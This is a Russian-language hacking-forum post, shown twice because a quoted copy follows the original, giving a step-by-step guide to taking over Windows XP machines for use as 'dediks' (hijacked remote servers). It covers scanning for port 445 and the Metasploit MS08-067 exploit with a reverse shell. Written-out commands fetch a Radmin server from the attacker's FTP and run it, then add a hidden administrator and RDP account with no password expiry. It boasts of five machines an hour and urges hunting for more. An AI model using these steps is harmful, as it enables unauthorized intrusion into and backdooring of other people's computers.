Уважаемый пользователь, вам следует зарегистрироваться или войти .
Статистика
PDA
Новое на форуме
Лучшие пользователи
Последнии новости
  • Страница 1 из 1
  • 1
Дедик или поможет нам Metasploit 3.2
SlaeRДата: Вс, 08.05.2011, 02:03 | Сообщение # 1
   
Группа:
Админы
Уровень:
 ±
Сообщений:
597
Сегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapiкоторый использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо !

Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить ,

Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы

Предположим что FTP сервер у нас установлен и настроен , в cmd пишем
Code
C:\>ftp
ftp> o
К 10.xx.xx.xx
Связь с 10.xx.xx.xx .
220 Welcome to 10.xx.xx.xx   FTP service.
Пользователь (10.xx.xx.xx :(none)): anonymous
230 Login successful.
ftp>

Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой
PHP код:
Code
dir

Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы

Code


get sys.exe
bye

Файл залит , выходим с фтп и возвращаемся а наш шелл

смотрим залит ли файл

и запускаем его
Code

   C:>sys.exe


Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу

Замечательно конект есть , вбиваем наш пароль и вот мы дома

Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную
Code
cmd   
net user user pass /add   
net localgroup Administrators user /add   
net localgroup "Remote Desktop Users" user /add   
net accounts /maxpwage:unlimited   
exit


Далее радмином в режиме "Телнет " запустим наш terminal.exe

Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику
Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50

Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники
Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо !
ps: Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидвал готовые деды , ИДЕТЕ ЛЕСОМ , дабы не сказать грубей !

Подробно про Метасплойт и эксплойты можно почитать тут http://www.metasploit.com/

про Terminal.exe здесь http://forum.antichat.ru/thread36042.html

Ну вроде теперь думаю отпадут вопросы , как и что , ищите сети со статистическими ip и дедиков будет в огромном количестве , а данной статейке лишний раз видно как уязвимы продукты Microsoft , поэтому я уже давно в качестве севера юзаю FreeBSD , а качестве десктопа Ubuntu (Linux Mint /etc) , думаю и другим пользователям пора уже сделать выводы !! В ходе эксперимента все данные пользователя не тронуты и на данное действие было дано его письменного согласие .



если увидите баг на сайте пишите мне
 
СообщениеСегодня мы рассмотрим метод добычи дедика по средством Metasploit 3.2 с эксплойтом MS08-067_netapiкоторый использует уязвимость в службе SMB на 445 порту , уязвимы все Windows XP Pro sp2 и sp3 , скачать Metasploit 3.2 можно от сюда http://www.metasploit.com/ , теперь скачаем сканер портов , я использую ip angry версии 2.21 она мне больше почему нравиться , офсайт http://www.angryziber.com/w/Download , предположим что всё это мы уже скачали и установлил , запускаем сканер портов отметив в сканере порт 445 , именно он нам очень нужен , если просканировав сеть вы не увидели наличие открытого 445 порта в этой сети делать нечего , если же такой порт имеется то это очень даже хорошо !

Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить ,

Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы

Предположим что FTP сервер у нас установлен и настроен , в cmd пишем
Code
C:\>ftp
ftp> o
К 10.xx.xx.xx
Связь с 10.xx.xx.xx .
220 Welcome to 10.xx.xx.xx   FTP service.
Пользователь (10.xx.xx.xx :(none)): anonymous
230 Login successful.
ftp>

Я настроил фтп на anonymous без пароля , ну вот мы зашли на свой фтп , смотрим где что у нас лежит командой
PHP код:
Code
dir

Видим что лежит наш уже приготовленный радмин-сервер sys.exe зальём его на комп жертвы

Code


get sys.exe
bye

Файл залит , выходим с фтп и возвращаемся а наш шелл

смотрим залит ли файл

и запускаем его
Code

   C:>sys.exe


Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу

Замечательно конект есть , вбиваем наш пароль и вот мы дома

Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную
Code
cmd   
net user user pass /add   
net localgroup Administrators user /add   
net localgroup "Remote Desktop Users" user /add   
net accounts /maxpwage:unlimited   
exit


Далее радмином в режиме "Телнет " запустим наш terminal.exe

Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику
Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50

Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники
Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо !
ps: Всё тут написанное не претендует на статью , теперь от себя хочу сказать следующие этот метод всё равно требует времени и терпения , если кто то хочет жать на кнопку "применить в Местаслойте" и чтобы он вам выкидвал готовые деды , ИДЕТЕ ЛЕСОМ , дабы не сказать грубей !

Подробно про Метасплойт и эксплойты можно почитать тут http://www.metasploit.com/

про Terminal.exe здесь http://forum.antichat.ru/thread36042.html

Ну вроде теперь думаю отпадут вопросы , как и что , ищите сети со статистическими ip и дедиков будет в огромном количестве , а данной статейке лишний раз видно как уязвимы продукты Microsoft , поэтому я уже давно в качестве севера юзаю FreeBSD , а качестве десктопа Ubuntu (Linux Mint /etc) , думаю и другим пользователям пора уже сделать выводы !! В ходе эксперимента все данные пользователя не тронуты и на данное действие было дано его письменного согласие .


Автор - SlaeR
Дата добавления - 08.05.2011 в 02:03
  • Страница 1 из 1
  • 1
Поиск:

Powered by SlaeR и Орёл в 2009-2024
Хостинг от uCoz